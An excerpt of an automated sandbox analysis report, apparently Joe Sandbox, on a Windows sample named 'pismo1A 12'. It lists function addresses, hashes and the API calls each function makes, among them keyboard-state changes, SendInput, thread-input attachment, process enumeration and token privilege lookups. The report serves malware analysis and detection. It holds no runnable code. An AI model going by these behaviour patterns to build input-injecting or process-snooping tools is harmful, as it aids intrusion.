Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: ab1d31b41686b35c9d6d5eb61a7766b6e2bda38b38b2abc185e87d06278077ed
Instruction ID: 89a73124e8606ef12820abe0ea1de6d31874f63297d84aac9e6bf0b1feae20b3
Opcode Fuzzy Hash: ab1d31b41686b35c9d6d5eb61a7766b6e2bda38b38b2abc185e87d06278077ed
Instruction Fuzzy Hash: E531A072E0021AABDB259F65DC91EEE7BA6EB40310B054169FC04DA390EB36DD51DB90

Function 007352C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00735352
GetWindowLongW.USER32(?,000000F0), ref: 00735375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00735382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007353A8

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 789f074b3344867d4b0d68c6235a13947e5878a982361f2de89e2888610c5fbb
Instruction ID: 1e7222878f50704243715a23565a02fc2a5a8f67577f662ddea1028c55e660db
Opcode Fuzzy Hash: 789f074b3344867d4b0d68c6235a13947e5878a982361f2de89e2888610c5fbb
Instruction Fuzzy Hash: 2431C534A95A0CEFFB309F14CC06BE83765EB05398F584101FA10961E2C7BC9D80DB46

Function 0070AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0070ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0070AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0070AC74
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0070ACC6

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5667233f3f4c5af3865350a5407e3e94a9a8fad36dad37329443ae2ae26513b6
Instruction ID: ea1ed921546819bce06bc48b11cc64dc9aa43812754b01e73d6def0601fe5827
Opcode Fuzzy Hash: 5667233f3f4c5af3865350a5407e3e94a9a8fad36dad37329443ae2ae26513b6
Instruction Fuzzy Hash: C931E130A04758FFFB25CB658C09BFF7BE6AB89310F05831AE485961D1D37D898587A2

Function 00737674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0073769A
GetWindowRect.USER32(?,?), ref: 00737710
PtInRect.USER32(?,?,00738B89), ref: 00737720
MessageBeep.USER32(00000000), ref: 0073778C

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: c5eb0cb15a0af7e03ab1a43f8f01ebc81c43190229ac6a02f4e44a9ffe4b6bec
Instruction ID: f7864ce93ab967b1cb4511743ddf6d6805f7c2815db6f2eb5bab507551c63fad
Opcode Fuzzy Hash: c5eb0cb15a0af7e03ab1a43f8f01ebc81c43190229ac6a02f4e44a9ffe4b6bec
Instruction Fuzzy Hash: 2341C0B4605254EFEB25CF58C895FA977F4FF49350F5980A8E5149B262C338E942CF90

Function 007316DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 007316EB

Part of subcall function 00703A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00703A57
Part of subcall function 00703A3D: GetCurrentThreadId.KERNEL32 ref: 00703A5E
Part of subcall function 00703A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007025B3), ref: 00703A65

GetCaretPos.USER32(?), ref: 007316FF
ClientToScreen.USER32(00000000,?), ref: 0073174C
GetForegroundWindow.USER32 ref: 00731752

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 11dc281ec4ed2079ecacb0fd452a37826348507df523d5d72249f85e4ef24476
Instruction ID: fec6c9fda4c5ca408ef7dd098c4d7876a296b129e8e12f43b028974c390da8a0
Opcode Fuzzy Hash: 11dc281ec4ed2079ecacb0fd452a37826348507df523d5d72249f85e4ef24476
Instruction Fuzzy Hash: ED314171D00149AFD700EFA9C885CAEBBFDEF89304B5480A9E415E7252DB359E45CFA4

Function 0070D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0070D501
Process32FirstW.KERNEL32(00000000,?), ref: 0070D50F
Process32NextW.KERNEL32(00000000,?), ref: 0070D52F
CloseHandle.KERNEL32(00000000), ref: 0070D5DC

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 34f56490af6994f5e276bf86365c562a995dcb001b4890a209b76651df839342
Instruction ID: 17459cf83d3dfdc8c4e5939f205efd14e9039bd210cd0e38999b055c7f14d320
Opcode Fuzzy Hash: 34f56490af6994f5e276bf86365c562a995dcb001b4890a209b76651df839342
Instruction Fuzzy Hash: C631AF71008300DFD315EF94CC81AAFBBE9EF9A354F140A2DF581921A1EB759E45CBA2

Function 00738FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2

GetCursorPos.USER32(?), ref: 00739001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,006F7711,?,?,?,?,?), ref: 00739016
GetCursorPos.USER32(?), ref: 0073905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,006F7711,?,?,?), ref: 00739094

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 631f0dc0f15f2ffe59b9f34a62fb7cd89c05e3b64d5b799003e7aaec4d01280f
Instruction ID: 78a230e9abb3d059965ba90498fe5a279fa2333dca14c2e7422b13f19352e374
Opcode Fuzzy Hash: 631f0dc0f15f2ffe59b9f34a62fb7cd89c05e3b64d5b799003e7aaec4d01280f
Instruction Fuzzy Hash: 6B21E535600118EFEB2A8F94CC58EFA7BB9EF49350F148055F60557262C379AD90DF60

Function 0070D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0073CB68), ref: 0070D2FB
GetLastError.KERNEL32 ref: 0070D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0070D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0073CB68), ref: 0070D376

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: a0bb29b07cbf73d0e1f1ba8570d262634029aee74b3c565ee54b6b27cbdc7e42
Instruction ID: 56eb907476ba225c1e1843c4611bf8d9b14e7ec5c71e496e1f430daf27627b88
Opcode Fuzzy Hash: a0bb29b07cbf73d0e1f1ba8570d262634029aee74b3c565ee54b6b27cbdc7e42
Instruction Fuzzy Hash: 72215970508301DFC720EF68C88186AB7E4AA56364F104A1DF499932E1EB399D46CB97

Function 00701571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00701014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0070102A
Part of subcall function 00701014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00701036
Part of subcall function 00701014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00701045
Part of subcall function 00701014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0070104C
Part of subcall function 00701014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00701062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007015BE
_memcmp.LIBVCRUNTIME ref: 007015E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00701617
HeapFree.KERNEL32(00000000), ref: 0070161E

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: da74fdaa69be942dda9dd51bee92a405397adce805ec550d0fc824abfea4819e
Instruction ID: 5d5303642d2a52d68172994d89729c57e2f563e34c4970c63387177d934c1107
Opcode Fuzzy Hash: da74fdaa69be942dda9dd51bee92a405397adce805ec550d0fc824abfea4819e
Instruction Fuzzy Hash: B1219A71E00108EFDB00DFA4CD45BEEB7F8EF40345F498559E441AB281EB39AA44DBA0

Function 00732782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0073280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00732824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00732832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00732840

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 762d8f82f3260e471942d84dd126546d2e831fa4c0e772debcfe5d53c7fac669
Instruction ID: ba5e5ae3b2656262d3860de7ba73c19fa8f310f2e3a1178de20337305286c00e
Opcode Fuzzy Hash: 762d8f82f3260e471942d84dd126546d2e831fa4c0e772debcfe5d53c7fac669
Instruction Fuzzy Hash: AB21C131204121AFF7159B24C855FAA7B96AF85324F248158F4268B6E3CB79FC42CB90

Function 007078F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00708D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0070790A,?,000000FF,?,00708754,00000000,?,0000001C,?,?), ref: 00708D8C
Part of subcall function 00708D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00708DB2
Part of subcall function 00708D7D: lstrcmpiW.KERNEL32(00000000,?,0070790A,?,000000FF,?,00708754,00000000,?,0000001C,?,?), ref: 00708DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00708754,00000000,?,0000001C,?,?,00000000), ref: 00707923
lstrcpyW.KERNEL32(00000000,?), ref: 00707949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00708754,00000000,?,0000001C,?,?,00000000), ref: 00707984

Strings

cdecl, xrefs: 0070797B

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 6a72c3cdfc974b12723a866b3e2a2b0ba8b365c6e69363eb8fec585379ec19f4
Instruction ID: 47fd2a87b9569087bb9e9c2e2e788ca8307d7e5a93c8a292569384b0e11c4ccc
Opcode Fuzzy Hash: 6a72c3cdfc974b12723a866b3e2a2b0ba8b365c6e69363eb8fec585379ec19f4
Instruction Fuzzy Hash: FE11067A200201FBDB159F34CC45D7A77E9FF45350B40812AF842C72A4EB35E811D7A5

Function 00735660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 007356BB
_wcslen.LIBCMT ref: 007356CD
_wcslen.LIBCMT ref: 007356D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00735816

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: bebd82aaa0bf223948b3a62562141dc5dfa0012a8ca5850f4c81a16f2561ce4f
Instruction ID: 9c704c9eed9cba8f5d431a18e6198f7185fd956a3670c77bc493d6df45b8825d
Opcode Fuzzy Hash: bebd82aaa0bf223948b3a62562141dc5dfa0012a8ca5850f4c81a16f2561ce4f
Instruction Fuzzy Hash: C211B171600618D6EB20DF658C86EEE77ACEF11760F50806AF915D6082EB789A80CB64

Function 00701A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00701A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00701A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00701A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00701A8A

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1c09a6e8f8573bf0e7d5959e8d3b8d8193f8266cf4bb6d7cb891fbf6730bacc1
Instruction ID: 07875626d4c2c0a5c067c9373627ac1f45355e87ff86866b07fa087b240981ca
Opcode Fuzzy Hash: 1c09a6e8f8573bf0e7d5959e8d3b8d8193f8266cf4bb6d7cb891fbf6730bacc1
Instruction Fuzzy Hash: BC11277AA01219FFEB11DBA4CD85FADBBB8EB08750F204191EA00B7290D6716E50DB94

Function 0070E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0070E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0070E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0070E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0070E24D

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: b7f8cb10388a9bfeb79fb6767a3a494d74b205f675169eb3daccc901065b7d07
Instruction ID: 677e0c96268b3ac1ab7e6fc497e1ce76bf1ceafbefd9fcc5e74b21e40d18c65d
Opcode Fuzzy Hash: b7f8cb10388a9bfeb79fb6767a3a494d74b205f675169eb3daccc901065b7d07
Instruction Fuzzy Hash: 3D110872904218BBD7019BAC9C09AAE7FACEB45355F008719F914E32D0D278C90087A5

Function 006CD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,006CCFF9,00000000,00000004,00000000), ref: 006CD218
GetLastError.KERNEL32 ref: 006CD224
__dosmaperr.LIBCMT ref: 006CD22B
ResumeThread.KERNEL32(00000000), ref: 006CD249

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 7e2b4f74ebeca40e609a52cb6a36393b4a376e25e46ba7e7a199bcf6014047ca
Instruction ID: a9ba343605694bdd57d1f714f1e1bde960490ec77ed3be5f4be23de069d13b74
Opcode Fuzzy Hash: 7e2b4f74ebeca40e609a52cb6a36393b4a376e25e46ba7e7a199bcf6014047ca
Instruction Fuzzy Hash: CF01D276805208BBDB215BA5DC09FFA7A6FDF81331F20422DFA25922D0CB75CA01D7A5

Function 006A600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006A604C
GetStockObject.GDI32(00000011), ref: 006A6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 006A606A

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 5ea2ad4a1915ea601ca66d4db86ece266ade7542b7199030d30dfa3f09aa92b0
Instruction ID: ab184efe63ce1a2bab8293ef35adbb6ad91f23feb617a32087b4c7560d529f16
Opcode Fuzzy Hash: 5ea2ad4a1915ea601ca66d4db86ece266ade7542b7199030d30dfa3f09aa92b0
Instruction Fuzzy Hash: 7211AD72101548BFEF125FA4CD44EEABB6AEF093A5F084205FA1462120C7369CA0EFA0

Function 006C3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 006C3B56

Part of subcall function 006C3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 006C3AD2
Part of subcall function 006C3AA3: ___AdjustPointer.LIBCMT ref: 006C3AED

_UnwindNestedFrames.LIBCMT ref: 006C3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 006C3B7C
CallCatchBlock.LIBVCRUNTIME ref: 006C3BA4

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 55cb905d6de44418e566d85ad83751043889f8ca63a1a9611b40e0da82845818
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 60011732100148BBDF129E95CC42EEB3B6EEF58754F04801CFE4896221C632E9619BA4

Function 006D3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,006A13C6,00000000,00000000,?,006D301A,006A13C6,00000000,00000000,00000000,?,006D328B,00000006,FlsSetValue), ref: 006D30A5
GetLastError.KERNEL32(?,006D301A,006A13C6,00000000,00000000,00000000,?,006D328B,00000006,FlsSetValue,00742290,FlsSetValue,00000000,00000364,?,006D2E46), ref: 006D30B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,006D301A,006A13C6,00000000,00000000,00000000,?,006D328B,00000006,FlsSetValue,00742290,FlsSetValue,00000000), ref: 006D30BF

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
